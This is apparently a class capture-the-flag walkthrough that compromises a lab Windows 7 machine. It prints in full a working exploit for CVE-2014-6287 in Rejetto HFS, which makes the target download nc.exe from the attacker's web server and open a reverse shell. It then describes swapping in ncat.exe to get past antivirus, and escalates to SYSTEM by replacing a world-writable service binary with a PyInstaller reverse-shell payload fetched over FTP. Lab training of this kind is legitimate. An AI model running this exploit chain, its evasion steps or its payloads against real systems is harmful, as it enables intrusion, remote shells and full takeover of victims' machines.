Walkthrough № 1:

Ports found:

21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
80/tcp    open  http          Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.24)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.24)
445/tcp   open  microsoft-ds  Microsoft Windows 7 - 10 microsoft-ds (workgroup: CSI)
3306/tcp  open  mysql         MariaDB (unauthorized)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
28580/tcp open  http          HttpFileServer httpd 2.3b

 
Now let's hack.

I will refer to our Kali attacking machine as <attack>
and to our target (Windows 7) machine as <target>.

Create a working folder on your Kali machine; I named it CTF2-2:

cd Desktop/
mkdir CTF2-2

The Metasploit module (exploit/windows/http/rejetto_hfs_exec) will not work here...
Antivirus is on =)

So let's find another exploit.

Found it!

https://www.exploit-db.com/exploits/39161/

We actually used this one in class...

Download it and rename it to exploit.py:

wget https://www.exploit-db.com/download/39161.py -O exploit.py
 
--2017-12-13 17:28:28--  https://www.exploit-db.com/download/39161.py
Resolving www.exploit-db.com (www.exploit-db.com)… 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2515 (2.5K) [application/txt]
Saving to: ‘exploit.py’
exploit.py          100%[===================>]   2.46K  --.-KB/s    in 0s
2017-12-13 17:28:29 (21.3 MB/s) -- ‘exploit.py’ saved [2515/2515]

Make it executable (optional, since we run it with python anyway):

chmod u+x exploit.py

Now edit the file:

nano exploit.py

Go to lines 35 and 36 and set the two variables. Note that the script is Python 2 (it imports urllib2), so run it with the Python 2 interpreter, which is what 'python' is on this Kali:

ip_addr = "192.168.0.40" <- our Kali machine's local address
local_port = "443" <- leave it at 443; this is the port our listener will wait on

The script as downloaded:
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#          It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#          It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.
 
#Usage : python Exploit.py <Target IP address> <Target Port Number>
 
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!
 
 
import urllib2
import sys
 
try:
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
 
    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
 
    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
 
    ip_addr = "192.168.0.40" #local IP address
    local_port = "443" # Local Port number
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""

What the script does: each request puts a null byte (%00) followed by an HFS macro into the ?search= parameter. The null byte breaks HFS's macro filtering (CVE-2014-6287), so the macro that follows is executed. The first request uses {.save|...} to write a small VBScript to C:\Users\Public\script.vbs; that script downloads nc.exe from our web server, http://192.168.0.40/nc.exe, into C:\Users\Public\. The second request runs the script with cscript.exe, and the third runs the downloaded binary, connecting a cmd.exe back to our <attack> IP and port:

C:\Users\Public\nc.exe -e cmd.exe 192.168.0.40 443

Now that we know what the script does, let's prepare our <attack> machine for it.
First check the apache2 status:

service apache2 status
● apache2.service - The Apache HTTP Server
Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset:
Active: inactive (dead)

If apache2 is not "active (running)", start it:

service apache2 start

Now put the 'nc.exe' file in the apache2 web root.
First locate 'nc.exe' on our <attack> machine:

locate nc.exe
 
/usr/share/sqlninja/apps/nc.exe
/usr/share/windows-binaries/nc.exe

Copy to apache2 server path:

cp /usr/share/windows-binaries/nc.exe /var/www/html/nc.exe

Check that the copy succeeded:

ls -l /var/www/html/
 
total 76
-rw-r--r-- 1 root root 10701 Nov  9 15:39 index.html
-rw-r--r-- 1 root root   612 Nov  9 15:38 index.nginx-debian.html
-rwxr-xr-x 1 root root 59392 Dec 14 11:30 nc.exe

Open a listener, and also check that the download works.
In a new terminal window, start a listener on port 443:

nc -nvlp 443
listening on [any] 443 ...

In another terminal, follow the apache2 access.log so we can see whether the GET request for nc.exe arrives:

tail -f -n 0 /var/log/apache2/access.log

Okay, time to exploit!

Make sure you are in the ~/Desktop/CTF2-2 folder.
Run the script (you may need to run it several times):

python exploit.py <target ip> 28580

Run it until your access.log tail shows requests:

root@kali:~/Desktop/CTF2-2# service apache2 restart
root@kali:~/Desktop/CTF2-2# python exploit.py 200.0.0.28 28580
root@kali:~/Desktop/CTF2-2# python exploit.py 200.0.0.28 28580
root@kali:~/Desktop/CTF2-2#

Stop re-running the exploit once the access.log shows the download:

tail -f -n 0 /var/log/apache2/access.log
192.168.0.47 - - [14/Dec/2017:12:54:42 +0200] "GET /nc.exe HTTP/1.1" 200 59698 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
192.168.0.47 - - [14/Dec/2017:12:54:42 +0200] "GET /nc.exe HTTP/1.1" 200 59698 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
192.168.0.47 - - [14/Dec/2017:12:54:43 +0200] "GET /nc.exe HTTP/1.1" 200 59698 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
192.168.0.47 - - [14/Dec/2017:12:54:43 +0200] "GET /nc.exe HTTP/1.1" 200 59698 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"

The GET requests return 200 (OK), so <target> really does download the 'nc.exe' file.
But... wait... the nc listener never opens a shell.
Why?
Something went wrong here.
Are the ports firewalled?
Or is it the antivirus?

I'll just say: TRY HARDER!

Okay, from here on we really are going to hack <target>.

The <target> machine runs an antivirus that recognizes our 'nc.exe' (by its contents, not by its name, of course)
and deletes it immediately, so the exploit's last step has no file left to execute.

So I used the simplest solution: I took the 'ncat.exe' that ships on our <attack> machine instead;

locate ncat.exe
 
/usr/share/ncat-w32/ncat.exe

Replace 'nc.exe' with 'ncat.exe' on our http server:

cp /usr/share/ncat-w32/ncat.exe /var/www/html/nc.exe

Check that the replacement succeeded:

ls -l /var/www/html
 
total 1648
-rw-r--r-- 1 root root   10701 Nov  9 15:39 index.html
-rw-r--r-- 1 root root     612 Nov  9 15:38 index.nginx-debian.html
-rwxr-xr-x 1 root root 1667584 Dec 14 13:12 nc.exe

'nc.exe' is now 1667584 bytes; before the swap it was 59392 (compare the earlier ls -l output above) =)

Now sit comfortably and enjoy.

Run the script again until your listener gets the shell!
It took me two runs.

python exploit.py 192.168.0.47 28580

You should see this on your listener:

nc -nvlp 443
listening on [any] 443 ...
connect to [200.0.0.27] from (UNKNOWN) [200.0.0.28] 49539
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Users\john\Downloads\hfs2.3b>

Great! We got a reverse shell =)
Let's check who we are; type 'whoami' in the shell:

whoami

You will see:

whoami
box2-1\john

Good, we are in, but not as SYSTEM...
What now?
Try harder, or keep reading!

Go get SYSTEM!

Now let's list the services the system runs, with their binary paths:

wmic service get name,pathname

That is a long list. Shorten it by dropping every line that contains "windows" (the built-in services under C:\Windows) and every line whose path is already enclosed in double quotes; what remains are the third-party services worth checking:

wmic service get name,pathname | findstr /i /v /c:windows /c:"\""

Now check the permissions on each remaining binary with icacls "full path":

icacls "C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe"

And we can see that this binary grants Everyone full control (F), so any user can replace it:

icacls "C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe"
C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                          BUILTIN\Administrators:(I)(F)
                                                          BUILTIN\Users:(I)(RX)
                                                          Everyone:(CI)(F)

Successfully processed 1 files; Failed processing 0 files

Let's check whether the service runs as SYSTEM and what its start type is:

sc qc ScsiAccess

The service runs as LocalSystem and its start type is AUTO_START, so it starts automatically at boot. That is exactly what we need: john is not an administrator, so he cannot stop or start the service himself (by default only administrators may control services), but after swapping the binary a reboot will make the Service Control Manager run our file as SYSTEM.

sc qc ScsiAccess
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ScsiAccess
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : ScsiAccess
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem
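The two checks done by hand above, icacls on the binary and sc qc on the service, as a small parser you can run over pasted output. This is an added example, not the write-up's own code: the SAMPLE_* strings are the page's icacls and sc qc output embedded as constructed input (plus one constructed safe ACL for contrast), and the function names and the table of write-equivalent rights are mine.

```python
#!/usr/bin/env python3
# Added example: flag a service whose binary a low-privileged user can overwrite and
# which runs as LocalSystem. Parses pasted `icacls <file>` and `sc qc <svc>` output.
import re

# File rights that let a principal replace or alter the binary
# (F full, M modify, W write, WD write data, AD append, D delete, WDAC/WO change ACL/owner).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "WDAC", "WO"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}      # inheritance markers, not rights
# Groups every low-privileged user is a member of.
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users",
            r"nt authority\interactive"}
ACE_RE = re.compile(r"^(?P<who>[^()]+?):(?P<flags>(?:\([A-Za-z,]*\))+)$")

# Constructed sample input: the page's own command output, pasted verbatim.
SAMPLE_SC = r"""
SERVICE_NAME: ScsiAccess
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ScsiAccess
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""
SAMPLE_ICACLS = r"""
C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                          BUILTIN\Administrators:(I)(F)
                                                          BUILTIN\Users:(I)(RX)
                                                          Everyone:(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""
# Constructed contrast case: same binary with a sane ACL (Users read/execute only).
SAMPLE_ICACLS_OK = r"""
C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                          BUILTIN\Administrators:(I)(F)
                                                          BUILTIN\Users:(I)(RX)
"""


def parse_icacls(text: str, path: str) -> list:
    """Return (principal, rights) pairs from `icacls <path>` output.
    icacls prints the path in front of the first ACE, so strip it first."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue                            # blank or summary line
        tokens = {t for grp in re.findall(r"\(([A-Za-z,]*)\)", m["flags"])
                  for t in grp.split(",") if t}
        if "DENY" in tokens:
            continue                            # a deny ACE grants nothing
        aces.append((m["who"].strip(), tokens - INHERIT_FLAGS))
    return aces


def parse_sc_qc(text: str) -> dict:
    """Return the KEY : value fields of `sc qc <service>` as a dict."""
    fields = {}
    for raw in text.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$", raw)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def assess(sc_text: str, icacls_text: str) -> dict:
    """Combine both outputs: who may overwrite the binary, and what that buys."""
    svc = parse_sc_qc(sc_text)
    binary = svc.get("BINARY_PATH_NAME", "").strip('"')
    weak = [(who, sorted(rights)) for who, rights in parse_icacls(icacls_text, binary)
            if who.lower() in LOW_PRIV and rights & WRITE_RIGHTS]
    runs_as = svc.get("SERVICE_START_NAME", "")
    return {
        "service": svc.get("SERVICE_NAME", ""),
        "binary": binary,
        "runs_as": runs_as,
        "auto_start": "AUTO_START" in svc.get("START_TYPE", ""),
        "weak_aces": weak,
        # writable binary + runs as SYSTEM: replace it, then restart the service or reboot
        "exploitable": bool(weak) and runs_as.lower() in ("localsystem", r"nt authority\system"),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(assess(SAMPLE_SC, SAMPLE_ICACLS), indent=2))
```

Feed it the output of the two commands for each service left over from the findstr filter; "exploitable" is true only when a group every user belongs to holds a write-equivalent right on the binary and the service account is SYSTEM.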

Preparing to get in as SYSTEM

1. Create a 'tmp' directory on drive C:

cd C:\
mkdir tmp
cd tmp

You should now be at

C:\tmp>

2. On your Windows 7 machine with PyInstaller, create a file ScsiAccess.py with this code:

from time import sleep
from os import system
import sys

# Delay the callback one minute after the Service Control Manager starts us at boot.
sleep(60)
# nc.exe here is the renamed ncat.exe the HFS exploit dropped in C:\Users\Public.
# It connects back to <attack> on port 4444 and hands it a cmd.exe.
system("C:\\Users\\Public\\nc.exe -nvv 192.168.0.40 4444 -e cmd.exe")
sys.exit(0)

Why not build a root.exe with msfvenom, as we did in class?
a. It takes longer.
b. The antivirus detects it.
We already know that our renamed ncat gets past it =)
Also note that this one calls back on port 4444, not 443.

Build ScsiAccess.exe from it:

C:\PyInstaller-2.1>python PyInstaller.py --onefile --noconsole ScsiAccess.py

The file is created at "C:\PyInstaller-2.1\ScsiAccess\dist\ScsiAccess.exe".
Move it to your <attack> machine, into your FTP folder.

3. In the <target> shell, rename the original 'ScsiAccess.exe' so we keep a backup:

move "C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe" "C:\Program Files\Photodex\ProShow Producer\ScsiAccessGood.bak"

Check that the file was renamed:

dir "C:\Program Files\Photodex\ProShow Producer\"

4. Move 'ScsiAccess.exe' from your <attack> machine to <target>.
Replace the user and password placeholders (without quotes: cmd's echo writes quotes literally into the file), then paste these lines into the shell. The redirection is written first so that a value ending in a digit never sits directly in front of the > operator (cmd treats a digit there as a handle number, as in 2>nul) and no trailing space ends up in the file:

>ftp.txt echo open 192.168.0.40
>>ftp.txt echo YOUR_FTP_USER
>>ftp.txt echo YOUR_FTP_PASS
>>ftp.txt echo bin
>>ftp.txt echo get ScsiAccess.exe
>>ftp.txt echo bye

Press Enter once more so the last line executes.
Check that 'ftp.txt' has been created:

type ftp.txt

Remember that 'ScsiAccess.exe' must be in the FTP folder on your <attack> machine.
Fetch 'ScsiAccess.exe':

ftp -s:ftp.txt

You will see the connection being made and the file being transferred:

ftp -s:ftp.txt
User (200.0.0.27:(none)): open 200.0.0.27


bin
get ScsiAccess.exe
bye


Check that the file arrived in the folder:

dir
 Volume in drive C has no label.
 Volume Serial Number is 8AA4-515F

 Directory of c:\tmp

12/14/2017  04:06 PM              .
12/14/2017  04:06 PM              ..
12/14/2017  04:03 PM                60 ftp.txt
12/14/2017  04:06 PM         3,826,479 ScsiAccess.exe
               2 File(s)      3,826,539 bytes
               2 Dir(s)  14,120,243,200 bytes free

Move 'ScsiAccess.exe' into the original folder:

move "C:\tmp\ScsiAccess.exe" "C:\Program Files\Photodex\ProShow Producer\"

Check that the move succeeded:

dir "C:\Program Files\Photodex\ProShow Producer\"

The folder should now contain these files:

12/14/2017  04:06 PM         3,826,479 ScsiAccess.exe
02/28/2017  06:21 AM           186,760 ScsiAccessGood.bak

5. Reboot <target>, sit back and wait.
Before you reboot, don't forget to open a new listener on port 4444:

nc -nvlp 4444

Now restart <target> from its shell (a standard user may reboot a workstation, which is why this needs no admin rights):

shutdown -r -f -t 0

I went to make a cup of coffee; when I returned I saw this:

nc -nvlp 4444
listening on [any] 4444 ...
connect to [200.0.0.27] from (UNKNOWN) [200.0.0.28] 49171
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 

HAPPY HACKING!
